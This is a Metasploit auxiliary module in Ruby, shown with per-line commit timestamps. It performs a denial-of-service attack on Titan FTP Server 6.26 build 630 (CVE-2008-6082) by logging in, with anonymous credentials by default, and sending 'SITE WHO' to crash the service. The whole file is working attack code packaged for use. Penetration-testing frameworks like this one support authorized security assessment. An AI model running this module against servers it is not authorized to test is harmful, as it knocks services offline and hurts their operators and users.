2009-01-09 05:33:26 +00:00
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2009-01-09 05:33:26 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2009-01-09 05:33:26 +00:00
|
|
|
##
|
|
|
|
|
2008-10-15 04:23:05 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Ftp
|
2008-11-18 20:00:31 +00:00
|
|
|
include Msf::Auxiliary::Dos
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2008-10-15 04:23:05 +00:00
|
|
|
def initialize(info = {})
|
2010-04-30 08:40:19 +00:00
|
|
|
super(update_info(info,
|
2008-10-15 04:23:05 +00:00
|
|
|
'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS',
|
|
|
|
'Description' => %q{
|
|
|
|
The Titan FTP server v6.26 build 630 can be DoS'd by
|
|
|
|
issuing "SITE WHO". You need a valid login so you
|
|
|
|
can send this command.
|
|
|
|
},
|
2009-04-03 15:05:35 +00:00
|
|
|
'Author' => 'kris katterjohn',
|
2008-10-15 04:23:05 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
2010-04-26 18:42:07 +00:00
|
|
|
[
|
|
|
|
[ 'CVE', '2008-6082'],
|
|
|
|
[ 'OSVDB', '49177'],
|
2012-06-28 19:27:12 +00:00
|
|
|
[ 'EDB', '6753']
|
2010-04-26 18:42:07 +00:00
|
|
|
],
|
2008-10-15 04:23:05 +00:00
|
|
|
'DisclosureDate' => 'Oct 14 2008'))
|
|
|
|
|
|
|
|
# They're required
|
|
|
|
register_options([
|
|
|
|
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
|
|
|
|
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
|
|
|
|
])
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2008-10-30 00:52:38 +00:00
|
|
|
return unless connect_login
|
2008-10-15 04:23:05 +00:00
|
|
|
print_status("Sending command...")
|
|
|
|
raw_send("SITE WHO\r\n")
|
2010-06-22 18:58:38 +00:00
|
|
|
select(nil,nil,nil,1)
|
2008-10-15 04:23:05 +00:00
|
|
|
disconnect
|
|
|
|
end
|
2008-10-30 00:52:38 +00:00
|
|
|
end
|